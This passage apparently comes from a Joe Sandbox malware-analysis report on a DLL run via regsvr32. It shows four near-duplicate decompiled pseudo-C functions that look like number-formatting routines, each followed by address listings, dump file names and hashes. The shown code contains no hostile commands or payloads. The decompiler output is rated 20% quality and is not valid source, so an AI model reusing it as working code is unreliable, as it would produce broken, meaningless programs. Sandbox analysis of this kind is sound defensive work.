				 *((short*)( *((intOrPtr*)(_t127 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t127 + 0x48)) =  *((intOrPtr*)(_t127 + 0x48)) + 1;
				return 1;
			}



















                                                                                                              0x18001c6fc
                                                                                                              0x18001c6fc
                                                                                                              0x18001c701
                                                                                                              0x18001c706
                                                                                                              0x18001c717
                                                                                                              0x18001c71a
                                                                                                              0x18001c71d
                                                                                                              0x18001c720
                                                                                                              0x18001c726
                                                                                                              0x18001c729
                                                                                                              0x18001c72f
                                                                                                              0x18001c731
                                                                                                              0x18001c733
                                                                                                              0x18001c73c
                                                                                                              0x18001c741
                                                                                                              0x18001c746
                                                                                                              0x18001c74f
                                                                                                              0x18001c75c
                                                                                                              0x18001c76c
                                                                                                              0x18001c772
                                                                                                              0x18001c777
                                                                                                              0x18001c783
                                                                                                              0x18001c795
                                                                                                              0x18001c797
                                                                                                              0x18001c79c
                                                                                                              0x18001c7a1
                                                                                                              0x18001c7a6
                                                                                                              0x18001c7b2
                                                                                                              0x18001c7c2
                                                                                                              0x18001c7c5
                                                                                                              0x18001c7c7
                                                                                                              0x18001c7cc
                                                                                                              0x18001c7d1
                                                                                                              0x18001c7d6
                                                                                                              0x18001c7de
                                                                                                              0x18001c7e7
                                                                                                              0x18001c7f0
                                                                                                              0x18001c7f6
                                                                                                              0x18001c7fb
                                                                                                              0x18001c7ff
                                                                                                              0x18001c802
                                                                                                              0x18001c809
                                                                                                              0x18001c80d
                                                                                                              0x18001c818
                                                                                                              0x18001c81d
                                                                                                              0x18001c823
                                                                                                              0x18001c82a
                                                                                                              0x18001c836
                                                                                                              0x18001c848
                                                                                                              0x18001c84a
                                                                                                              0x18001c84f
                                                                                                              0x18001c851
                                                                                                              0x18001c856
                                                                                                              0x18001c858
                                                                                                              0x18001c85f
                                                                                                              0x18001c868
                                                                                                              0x18001c871
                                                                                                              0x18001c87c
                                                                                                              0x18001c885
                                                                                                              0x18001c88a
                                                                                                              0x18001c88c
                                                                                                              0x18001c88f
                                                                                                              0x18001c892
                                                                                                              0x18001c899
                                                                                                              0x18001c89b
                                                                                                              0x18001c8a2
                                                                                                              0x18001c8af
                                                                                                              0x18001c8b6
                                                                                                              0x18001c8be
                                                                                                              0x18001c8c0
                                                                                                              0x18001c8c4
                                                                                                              0x18001c8c8
                                                                                                              0x18001c8d1
                                                                                                              0x18001c8d6
                                                                                                              0x18001c8db
                                                                                                              0x18001c8df
                                                                                                              0x18001c8ec
                                                                                                              0x18001c8f7
                                                                                                              0x18001c900
                                                                                                              0x18001c902
                                                                                                              0x18001c90b
                                                                                                              0x18001c90e
                                                                                                              0x18001c92b

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2fb2cda9dfa77c8f5633a862135b1e4d6fb0f2ebd8c77b2093bb9a4212e675b7
                                                                                                              • Instruction ID: 574c8985a19b3ee6fafb34c12e274d004fad3071c66fe242f6b821fdf25c1f92
                                                                                                              • Opcode Fuzzy Hash: 2fb2cda9dfa77c8f5633a862135b1e4d6fb0f2ebd8c77b2093bb9a4212e675b7
                                                                                                              • Instruction Fuzzy Hash: 5F51B772504E4886FBA78F28C054BEC2760E74DBECF148215FA490B6C9CF75CA4AC74A
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001D2FC Relevance: .2, Instructions: 154COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 20%
                                                                                                              			E0000000118001D2FC(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed long long _v40;
				void* __rbp;
				void* _t72;
				intOrPtr _t85;
				signed int _t94;
				void* _t103;
				intOrPtr _t104;
				signed int _t108;
				intOrPtr _t122;
				void* _t125;
				signed long long _t146;
				signed long long _t147;
				void* _t153;
				void* _t155;

				_t153 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t125 = __rcx;
				r14b = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				r15d = 8;
				_t103 = _t85 - 5;
				if (_t103 > 0) goto 0x8001d3db;
				if (_t103 == 0) goto 0x8001d355;
				_t104 = _t85;
				if (_t104 == 0) goto 0x8001d42f;
				if (_t104 == 0) goto 0x8001d3ab;
				if (_t104 == 0) goto 0x8001d37c;
				if (_t104 == 0) goto 0x8001d42f;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001d3fb;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d458;
				0x800198c0();
				goto 0x8001d45d;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d3a1;
				E00000001180017260( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001d45d;
				0x80017908();
				goto 0x8001d45d;
				_a8 = _a8 & 0x00000000;
				_t108 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t108 == 0) goto 0x8001d3d1;
				_t72 = E00000001180016978( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001d45d;
				E00000001180016DF0(_t72, __rcx, __rcx,  &_a8, _t153);
				goto 0x8001d45d;
				if (_t108 == 0) goto 0x8001d355;
				if (_t108 == 0) goto 0x8001d355;
				if (_t108 == 0) goto 0x8001d355;
				goto 0x8001d343;
				_t122 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t122 + 0x30)) = 1;
				 *((intOrPtr*)(_t122 + 0x2c)) = 0x16;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = _v40 & 0x00000000;
				0x80013858();
				goto 0x8001d50d;
				_a8 = _a8 & 0x00000000;
				if (0 == 0) goto 0x8001d451;
				0x80017d78();
				goto 0x8001d45d;
				E000000011800181E4( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8, _t153);
				goto 0x8001d45d;
				0x80019d30();
				if (0 == 0) goto 0x8001d428;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 1) goto 0x8001d477;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001d50b;
				_t146 = _a8;
				if (0 == 0) goto 0x8001d495;
				if (_t146 >= 0) goto 0x8001d495;
				_t147 =  ~_t146;
				_t94 =  *(__rcx + 0x28) | 0x00000040;
				 *(__rcx + 0x28) = _t94;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d4a4;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001d4bb;
				 *(__rcx + 0x28) = _t94 & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001d4c4;
				 *(_t125 + 0x28) =  *(_t125 + 0x28) & 0xffffffdf;
				 *((char*)(_t125 + 0x4c)) = 0;
				r8b = r14b;
				if (_t155 != _t155) goto 0x8001d4dd;
				0x80021968();
				goto 0x8001d4e4;
				E000000011800203E0(__esi, _t125, _t147);
				if (0 == 0) goto 0x8001d50b;
				if ( *((intOrPtr*)(_t125 + 0x48)) == 0) goto 0x8001d4fd;
				if ( *((char*)( *((intOrPtr*)(_t125 + 0x40)))) == 0x30) goto 0x8001d50b;
				 *((long long*)(_t125 + 0x40)) =  *((long long*)(_t125 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t125 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t125 + 0x48)) =  *((intOrPtr*)(_t125 + 0x48)) + 1;
				return 1;
			}


















                                                                                                              0x18001d2fc
                                                                                                              0x18001d2fc
                                                                                                              0x18001d301
                                                                                                              0x18001d306
                                                                                                              0x18001d317
                                                                                                              0x18001d31a
                                                                                                              0x18001d31d
                                                                                                              0x18001d320
                                                                                                              0x18001d326
                                                                                                              0x18001d329
                                                                                                              0x18001d32f
                                                                                                              0x18001d331
                                                                                                              0x18001d333
                                                                                                              0x18001d33c
                                                                                                              0x18001d341
                                                                                                              0x18001d346
                                                                                                              0x18001d34f
                                                                                                              0x18001d35c
                                                                                                              0x18001d36c
                                                                                                              0x18001d372
                                                                                                              0x18001d377
                                                                                                              0x18001d383
                                                                                                              0x18001d395
                                                                                                              0x18001d397
                                                                                                              0x18001d39c
                                                                                                              0x18001d3a1
                                                                                                              0x18001d3a6
                                                                                                              0x18001d3b2
                                                                                                              0x18001d3c2
                                                                                                              0x18001d3c5
                                                                                                              0x18001d3c7
                                                                                                              0x18001d3cc
                                                                                                              0x18001d3d1
                                                                                                              0x18001d3d6
                                                                                                              0x18001d3de
                                                                                                              0x18001d3e7
                                                                                                              0x18001d3f0
                                                                                                              0x18001d3f6
                                                                                                              0x18001d3fb
                                                                                                              0x18001d3ff
                                                                                                              0x18001d402
                                                                                                              0x18001d409
                                                                                                              0x18001d40d
                                                                                                              0x18001d418
                                                                                                              0x18001d41d
                                                                                                              0x18001d423
                                                                                                              0x18001d42a
                                                                                                              0x18001d436
                                                                                                              0x18001d448
                                                                                                              0x18001d44a
                                                                                                              0x18001d44f
                                                                                                              0x18001d451
                                                                                                              0x18001d456
                                                                                                              0x18001d458
                                                                                                              0x18001d45f
                                                                                                              0x18001d468
                                                                                                              0x18001d471
                                                                                                              0x18001d47c
                                                                                                              0x18001d485
                                                                                                              0x18001d48a
                                                                                                              0x18001d48c
                                                                                                              0x18001d48f
                                                                                                              0x18001d492
                                                                                                              0x18001d499
                                                                                                              0x18001d49b
                                                                                                              0x18001d4a2
                                                                                                              0x18001d4af
                                                                                                              0x18001d4b6
                                                                                                              0x18001d4be
                                                                                                              0x18001d4c0
                                                                                                              0x18001d4c4
                                                                                                              0x18001d4c8
                                                                                                              0x18001d4d1
                                                                                                              0x18001d4d6
                                                                                                              0x18001d4db
                                                                                                              0x18001d4df
                                                                                                              0x18001d4ec
                                                                                                              0x18001d4f2
                                                                                                              0x18001d4fb
                                                                                                              0x18001d4fd
                                                                                                              0x18001d505
                                                                                                              0x18001d508
                                                                                                              0x18001d525

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e4403f0d54fb1019709c5a48cacd662f12ea5cf3f87840b820aa961d4794a5ce
                                                                                                              • Instruction ID: 6ca416688b0883489396a2e7091885156c617ffc9be08e08ba496a9164b2d5ab
                                                                                                              • Opcode Fuzzy Hash: e4403f0d54fb1019709c5a48cacd662f12ea5cf3f87840b820aa961d4794a5ce
                                                                                                              • Instruction Fuzzy Hash: F1518E72114E4C87FBAB8E29D0543EC27A0E74DBDCF148216FA4A0A699CF35DA4AC701
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001B4F8 Relevance: .2, Instructions: 154COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 20%
                                                                                                              			E0000000118001B4F8(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed long long _v40;
				void* __rbp;
				void* _t72;
				intOrPtr _t85;
				signed int _t94;
				void* _t103;
				intOrPtr _t104;
				signed int _t108;
				intOrPtr _t122;
				void* _t125;
				signed long long _t146;
				signed long long _t147;
				void* _t153;
				void* _t155;

				_t153 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t125 = __rcx;
				r14b = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				r15d = 8;
				_t103 = _t85 - 5;
				if (_t103 > 0) goto 0x8001b5d7;
				if (_t103 == 0) goto 0x8001b551;
				_t104 = _t85;
				if (_t104 == 0) goto 0x8001b62b;
				if (_t104 == 0) goto 0x8001b5a7;
				if (_t104 == 0) goto 0x8001b578;
				if (_t104 == 0) goto 0x8001b62b;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001b5f7;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b654;
				0x800197b8();
				goto 0x8001b659;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b59d;
				E00000001180017158( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001b659;
				0x80017800();
				goto 0x8001b659;
				_a8 = _a8 & 0x00000000;
				_t108 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t108 == 0) goto 0x8001b5cd;
				_t72 = E00000001180016870( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001b659;
				E00000001180016CE8(_t72, __rcx, __rcx,  &_a8, _t153);
				goto 0x8001b659;
				if (_t108 == 0) goto 0x8001b551;
				if (_t108 == 0) goto 0x8001b551;
				if (_t108 == 0) goto 0x8001b551;
				goto 0x8001b53f;
				_t122 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t122 + 0x30)) = 1;
				 *((intOrPtr*)(_t122 + 0x2c)) = 0x16;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = _v40 & 0x00000000;
				0x80013858();
				goto 0x8001b709;
				_a8 = _a8 & 0x00000000;
				if (0 == 0) goto 0x8001b64d;
				0x80017c70();
				goto 0x8001b659;
				E000000011800180E0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8, _t153);
				goto 0x8001b659;
				0x80019c28();
				if (0 == 0) goto 0x8001b624;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 1) goto 0x8001b673;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001b707;
				_t146 = _a8;
				if (0 == 0) goto 0x8001b691;
				if (_t146 >= 0) goto 0x8001b691;
				_t147 =  ~_t146;
				_t94 =  *(__rcx + 0x28) | 0x00000040;
				 *(__rcx + 0x28) = _t94;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001b6a0;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001b6b7;
				 *(__rcx + 0x28) = _t94 & 0xfffffff7;
				_t48 = _t125 + 0x50; // 0x91
				E0000000118001671C(__rcx, _t48,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001b6c0;
				 *(_t125 + 0x28) =  *(_t125 + 0x28) & 0xffffffdf;
				 *((char*)(_t125 + 0x4c)) = 0;
				r8b = r14b;
				if (_t155 != _t155) goto 0x8001b6d9;
				E0000000118002111C(0, _t125, _t147);
				goto 0x8001b6e0;
				0x8001fba4();
				if (0 == 0) goto 0x8001b707;
				if ( *((intOrPtr*)(_t125 + 0x48)) == 0) goto 0x8001b6f9;
				if ( *((char*)( *((intOrPtr*)(_t125 + 0x40)))) == 0x30) goto 0x8001b707;
				 *((long long*)(_t125 + 0x40)) =  *((long long*)(_t125 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t125 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t125 + 0x48)) =  *((intOrPtr*)(_t125 + 0x48)) + 1;
				return 1;
			}


















                                                                                                              0x18001b4f8
                                                                                                              0x18001b4f8
                                                                                                              0x18001b4fd
                                                                                                              0x18001b502
                                                                                                              0x18001b513
                                                                                                              0x18001b516
                                                                                                              0x18001b519
                                                                                                              0x18001b51c
                                                                                                              0x18001b522
                                                                                                              0x18001b525
                                                                                                              0x18001b52b
                                                                                                              0x18001b52d
                                                                                                              0x18001b52f
                                                                                                              0x18001b538
                                                                                                              0x18001b53d
                                                                                                              0x18001b542
                                                                                                              0x18001b54b
                                                                                                              0x18001b558
                                                                                                              0x18001b568
                                                                                                              0x18001b56e
                                                                                                              0x18001b573
                                                                                                              0x18001b57f
                                                                                                              0x18001b591
                                                                                                              0x18001b593
                                                                                                              0x18001b598
                                                                                                              0x18001b59d
                                                                                                              0x18001b5a2
                                                                                                              0x18001b5ae
                                                                                                              0x18001b5be
                                                                                                              0x18001b5c1
                                                                                                              0x18001b5c3
                                                                                                              0x18001b5c8
                                                                                                              0x18001b5cd
                                                                                                              0x18001b5d2
                                                                                                              0x18001b5da
                                                                                                              0x18001b5e3
                                                                                                              0x18001b5ec
                                                                                                              0x18001b5f2
                                                                                                              0x18001b5f7
                                                                                                              0x18001b5fb
                                                                                                              0x18001b5fe
                                                                                                              0x18001b605
                                                                                                              0x18001b609
                                                                                                              0x18001b614
                                                                                                              0x18001b619
                                                                                                              0x18001b61f
                                                                                                              0x18001b626
                                                                                                              0x18001b632
                                                                                                              0x18001b644
                                                                                                              0x18001b646
                                                                                                              0x18001b64b
                                                                                                              0x18001b64d
                                                                                                              0x18001b652
                                                                                                              0x18001b654
                                                                                                              0x18001b65b
                                                                                                              0x18001b664
                                                                                                              0x18001b66d
                                                                                                              0x18001b678
                                                                                                              0x18001b681
                                                                                                              0x18001b686
                                                                                                              0x18001b688
                                                                                                              0x18001b68b
                                                                                                              0x18001b68e
                                                                                                              0x18001b695
                                                                                                              0x18001b697
                                                                                                              0x18001b69e
                                                                                                              0x18001b6ab
                                                                                                              0x18001b6ae
                                                                                                              0x18001b6b2
                                                                                                              0x18001b6ba
                                                                                                              0x18001b6bc
                                                                                                              0x18001b6c0
                                                                                                              0x18001b6c4
                                                                                                              0x18001b6cd
                                                                                                              0x18001b6d2
                                                                                                              0x18001b6d7
                                                                                                              0x18001b6db
                                                                                                              0x18001b6e8
                                                                                                              0x18001b6ee
                                                                                                              0x18001b6f7
                                                                                                              0x18001b6f9
                                                                                                              0x18001b701
                                                                                                              0x18001b704
                                                                                                              0x18001b721

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d2edb1abf130f856b4ff46facd1f170f8fb3f255e21a1a76e62fb97658c70cb2
                                                                                                              • Instruction ID: c74f8609eb3864b27ac62a793dc65666fb7d7e18c5fa16907c6366d79edf8444
                                                                                                              • Opcode Fuzzy Hash: d2edb1abf130f856b4ff46facd1f170f8fb3f255e21a1a76e62fb97658c70cb2
                                                                                                              • Instruction Fuzzy Hash: 1351B132110E4886FBB79F29C0143EC27A5E75DBDCF188215FA498A7D9CF29CA49C700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001E508 Relevance: .2, Instructions: 154COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 20%
                                                                                                              			E0000000118001E508(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed long long _v40;
				void* __rbp;
				void* _t72;
				intOrPtr _t85;
				signed int _t94;
				void* _t103;
				intOrPtr _t104;
				signed int _t108;
				intOrPtr _t122;
				void* _t125;
				signed long long _t146;
				signed long long _t147;
				void* _t153;
				void* _t155;

				_t153 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t125 = __rcx;
				r14b = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				r15d = 8;
				_t103 = _t85 - 5;
				if (_t103 > 0) goto 0x8001e5e7;
				if (_t103 == 0) goto 0x8001e561;
				_t104 = _t85;
				if (_t104 == 0) goto 0x8001e63b;
				if (_t104 == 0) goto 0x8001e5b7;
				if (_t104 == 0) goto 0x8001e588;
				if (_t104 == 0) goto 0x8001e63b;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001e607;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e664;
				0x800197b8();
				goto 0x8001e669;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e5ad;
				E00000001180017158( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001e669;
				0x80017800();
				goto 0x8001e669;
				_a8 = _a8 & 0x00000000;
				_t108 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t108 == 0) goto 0x8001e5dd;
				_t72 = E00000001180016870( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001e669;
				E00000001180016CE8(_t72, __rcx, __rcx,  &_a8, _t153);
				goto 0x8001e669;
				if (_t108 == 0) goto 0x8001e561;
				if (_t108 == 0) goto 0x8001e561;
				if (_t108 == 0) goto 0x8001e561;
				goto 0x8001e54f;
				_t122 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t122 + 0x30)) = 1;
				 *((intOrPtr*)(_t122 + 0x2c)) = 0x16;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = _v40 & 0x00000000;
				0x80013858();
				goto 0x8001e719;
				_a8 = _a8 & 0x00000000;
				if (0 == 0) goto 0x8001e65d;
				0x80017c70();
				goto 0x8001e669;
				E000000011800180E0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8, _t153);
				goto 0x8001e669;
				0x80019c28();
				if (0 == 0) goto 0x8001e634;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 1) goto 0x8001e683;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001e717;
				_t146 = _a8;
				if (0 == 0) goto 0x8001e6a1;
				if (_t146 >= 0) goto 0x8001e6a1;
				_t147 =  ~_t146;
				_t94 =  *(__rcx + 0x28) | 0x00000040;
				 *(__rcx + 0x28) = _t94;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e6b0;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001e6c7;
				 *(__rcx + 0x28) = _t94 & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001e6d0;
				 *(_t125 + 0x28) =  *(_t125 + 0x28) & 0xffffffdf;
				 *((char*)(_t125 + 0x4c)) = 0;
				r8b = r14b;
				if (_t155 != _t155) goto 0x8001e6e9;
				0x80021fcc();
				goto 0x8001e6f0;
				E00000001180020A0C(__esi, _t125, _t147);
				if (0 == 0) goto 0x8001e717;
				if ( *((intOrPtr*)(_t125 + 0x48)) == 0) goto 0x8001e709;
				if ( *((char*)( *((intOrPtr*)(_t125 + 0x40)))) == 0x30) goto 0x8001e717;
				 *((long long*)(_t125 + 0x40)) =  *((long long*)(_t125 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t125 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t125 + 0x48)) =  *((intOrPtr*)(_t125 + 0x48)) + 1;
				return 1;
			}


















                                                                                                              0x18001e508
                                                                                                              0x18001e508
                                                                                                              0x18001e50d
                                                                                                              0x18001e512
                                                                                                              0x18001e523
                                                                                                              0x18001e526
                                                                                                              0x18001e529
                                                                                                              0x18001e52c
                                                                                                              0x18001e532
                                                                                                              0x18001e535
                                                                                                              0x18001e53b
                                                                                                              0x18001e53d
                                                                                                              0x18001e53f
                                                                                                              0x18001e548
                                                                                                              0x18001e54d
                                                                                                              0x18001e552
                                                                                                              0x18001e55b
                                                                                                              0x18001e568
                                                                                                              0x18001e578
                                                                                                              0x18001e57e
                                                                                                              0x18001e583
                                                                                                              0x18001e58f
                                                                                                              0x18001e5a1
                                                                                                              0x18001e5a3
                                                                                                              0x18001e5a8
                                                                                                              0x18001e5ad
                                                                                                              0x18001e5b2
                                                                                                              0x18001e5be
                                                                                                              0x18001e5ce
                                                                                                              0x18001e5d1
                                                                                                              0x18001e5d3
                                                                                                              0x18001e5d8
                                                                                                              0x18001e5dd
                                                                                                              0x18001e5e2
                                                                                                              0x18001e5ea
                                                                                                              0x18001e5f3
                                                                                                              0x18001e5fc
                                                                                                              0x18001e602
                                                                                                              0x18001e607
                                                                                                              0x18001e60b
                                                                                                              0x18001e60e
                                                                                                              0x18001e615
                                                                                                              0x18001e619
                                                                                                              0x18001e624
                                                                                                              0x18001e629
                                                                                                              0x18001e62f
                                                                                                              0x18001e636
                                                                                                              0x18001e642
                                                                                                              0x18001e654
                                                                                                              0x18001e656
                                                                                                              0x18001e65b
                                                                                                              0x18001e65d
                                                                                                              0x18001e662
                                                                                                              0x18001e664
                                                                                                              0x18001e66b
                                                                                                              0x18001e674
                                                                                                              0x18001e67d
                                                                                                              0x18001e688
                                                                                                              0x18001e691
                                                                                                              0x18001e696
                                                                                                              0x18001e698
                                                                                                              0x18001e69b
                                                                                                              0x18001e69e
                                                                                                              0x18001e6a5
                                                                                                              0x18001e6a7
                                                                                                              0x18001e6ae
                                                                                                              0x18001e6bb
                                                                                                              0x18001e6c2
                                                                                                              0x18001e6ca
                                                                                                              0x18001e6cc
                                                                                                              0x18001e6d0
                                                                                                              0x18001e6d4
                                                                                                              0x18001e6dd
                                                                                                              0x18001e6e2
                                                                                                              0x18001e6e7
                                                                                                              0x18001e6eb
                                                                                                              0x18001e6f8
                                                                                                              0x18001e6fe
                                                                                                              0x18001e707
                                                                                                              0x18001e709
                                                                                                              0x18001e711
                                                                                                              0x18001e714
                                                                                                              0x18001e731

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f053bf7a21944a540571db01deba52d96da1462f95019be173282ba9bd20ca2
                                                                                                              • Instruction ID: cdc9fb6877293899410da448a2a1a35827fc722a544a5572b59d1a17120d9582
                                                                                                              • Opcode Fuzzy Hash: 7f053bf7a21944a540571db01deba52d96da1462f95019be173282ba9bd20ca2
                                                                                                              • Instruction Fuzzy Hash: 3151A072114E8886F7A78F2880147ED27A1E75EBDCF598216FA490B6D9CF25CA49C700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

